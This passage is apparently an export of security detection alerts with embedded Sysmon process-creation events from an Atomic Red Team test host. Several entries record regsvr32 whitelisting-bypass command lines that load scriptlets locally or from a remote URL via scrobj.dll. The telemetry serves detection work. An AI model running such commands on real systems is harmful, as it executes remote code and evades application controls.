<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.054072Z"">
</TimeCreated>
<EventRecordID>4038</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.049</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010EB313800</Data>
<Data Name=""ProcessId"">2076</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ParentProcessId"">2832</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
</TimeCreated>
<EventRecordID>4037</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:44.026061Z"">
</TimeCreated>
<EventRecordID>4037</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:44.010</Data>
<Data Name=""ProcessGuid"">747F3D96-D978-5D31-0000-0010442F3800</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:43.574378Z"">
</TimeCreated>
<EventRecordID>4036</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:43.460</Data>
<Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-0010771B3800</Data>
<Data Name=""ProcessId"">1476</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:43.445040Z"">
</TimeCreated>
<EventRecordID>4035</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:43.339</Data>
<Data Name=""ProcessGuid"">747F3D96-D977-5D31-0000-00100A0E3800</Data>
<Data Name=""ProcessId"">3848</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ParentProcessId"">2332</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.841951Z"">
</TimeCreated>
<EventRecordID>4033</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.834</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001093EA3700</Data>
<Data Name=""ProcessId"">2332</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ParentProcessId"">4444</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
</TimeCreated>
<EventRecordID>4032</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ProcessId"">4444</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:53:42.815966Z"">
</TimeCreated>
<EventRecordID>4032</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:53:42.803</Data>
<Data Name=""ProcessGuid"">747F3D96-D976-5D31-0000-001041E83700</Data>
<Data Name=""ProcessId"">4444</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
